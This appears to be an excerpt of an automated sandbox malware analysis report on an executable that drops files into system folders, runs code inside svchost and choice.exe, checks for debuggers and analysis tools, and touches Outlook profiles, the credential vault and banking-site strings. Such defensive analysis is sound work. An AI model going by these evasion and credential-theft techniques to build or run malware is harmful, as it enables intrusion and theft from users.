                Source: C:\Windows\SysWOW64\choice.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\choice.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\choice.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\choice.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: OVZizpEU7Q.exe Static file information: File size 1786368 > 1048576
                Source: OVZizpEU7Q.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000002.00000003.2654664755.000000000362B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2654649568.000000000361A000.00000004.00000020.00020000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2286369112.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: OVZizpEU7Q.exe, 00000000.00000003.2297347898.0000000004200000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CkszoACLEZHP.exe, 00000006.00000002.4758052353.000000000081E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OVZizpEU7Q.exe, 00000000.00000003.2297299983.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2297520146.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2583676735.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585501083.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.0000000004F50000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2688054476.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2685693574.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.00000000050EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2297299983.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2297520146.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2583676735.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585501083.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.0000000004F50000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2688054476.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2685693574.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.00000000050EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2297347898.0000000004200000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 00000002.00000003.2654664755.000000000362B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2654649568.000000000361A000.00000004.00000020.00020000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp
                Source: alg.exe.0.drStatic PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: alg.exe.0.drStatic PE information: real checksum: 0x2096e should be: 0x18a805
                Source: armsvc.exe.0.drStatic PE information: section name: .didat
                Source: alg.exe.0.drStatic PE information: section name: .didat
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB0CAh; ret 0_2_00ACB061
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB30Dh; ret 0_2_00ACB1E6
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB2F2h; ret 0_2_00ACB262
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB255h; ret 0_2_00ACB2ED
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB2D0h; ret 0_2_00ACB346
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00ACB180 push 00ACB37Fh; ret 0_2_00ACB3B7
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AC520C push 00AC528Fh; ret 0_2_00AC522D
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE852Eh; ret 0_2_00AE7F3A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8514h; ret 0_2_00AE7F66
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE7E66h; ret 0_2_00AE8057
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE817Ah; ret 0_2_00AE808B
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE82E5h; ret 0_2_00AE80D9
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE826Ah; ret 0_2_00AE819E
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE849Ch; ret 0_2_00AE81E4
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE805Ch; ret 0_2_00AE8255
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8321h; ret 0_2_00AE82E0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE7FBFh; ret 0_2_00AE831F
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE7FA8h; ret 0_2_00AE834C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE84BAh; ret 0_2_00AE83E2
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8426h; ret 0_2_00AE84D8
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8075h; ret 0_2_00AE84FD
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE808Ch; ret 0_2_00AE8512
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8B6Fh; ret 0_2_00AE8596
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8E94h; ret 0_2_00AE85C9
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE878Bh; ret 0_2_00AE8734
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8D45h; ret 0_2_00AE87D3
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8E5Fh; ret 0_2_00AE885F
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8AB5h; ret 0_2_00AE8B13
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AE8550 push 00AE8784h; ret 0_2_00AE8CA1
                Source: OVZizpEU7Q.exeStatic PE information: section name: .reloc entropy: 7.9380325794644255

                Persistence and Installation Behavior

                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00AECBD0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeAPI/Special instruction interceptor: Address: D704C4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: OVZizpEU7Q.exe, 00000000.00000003.2284900714.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2285029166.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315317261.0000000000D9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEGD
                Source: OVZizpEU7Q.exe, 00000000.00000003.2284900714.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2285029166.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315317261.0000000000D9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
                Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 1869Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 8103Jump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeDropped PE file which has not been started: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeAPI coverage: 4.7 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe TID: 5672Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep time: -70000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep time: -57000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe TID: 4760Thread sleep time: -38000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6528Thread sleep count: 1869 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6528Thread sleep time: -3738000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6528Thread sleep count: 8103 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6528Thread sleep time: -16206000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: G109m407.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: choice.exe, 00000007.00000002.4760480225.0000000008125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: merchant_domainVARCHARpageVMware20,11696428655U6^
                Source: G109m407.7.drBinary or memory string: discord.comVMware20,11696428655f
                Source: G109m407.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: global block list test formVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: OVZizpEU7Q.exe, 00000000.00000002.2312003459.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000002.2315025935.0000000000D71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: G109m407.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: G109m407.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: G109m407.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: G109m407.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: G109m407.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4757471775.0000000003225000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2976586825.0000020F69B6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: G109m407.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: G109m407.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: G109m407.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: G109m407.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: G109m407.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: G109m407.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: G109m407.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: choice.exe, 00000007.00000002.4760480225.0000000008125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pageVMware20,11696428655U6^
                Source: G109m407.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: G109m407.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: G109m407.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: G109m407.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeAPI call chain: ExitProcess graph end nodegraph_0-108818
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E rdtsc 2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D33 LdrLoadDll,2_2_00417D33
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00AC1130 mov eax, dword ptr fs:[00000030h]0_2_00AC1130
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00B03F3D mov eax, dword ptr fs:[00000030h]0_2_00B03F3D
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00D6F0C0 mov eax, dword ptr fs:[00000030h]0_2_00D6F0C0
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00D70790 mov eax, dword ptr fs:[00000030h]0_2_00D70790
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00D70730 mov eax, dword ptr fs:[00000030h]0_2_00D70730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h]2_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]2_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h]2_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h]2_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]2_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h]2_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h]2_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]2_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h]2_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h]2_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h]2_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h]2_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h]2_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h]2_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h]2_2_03CD8350
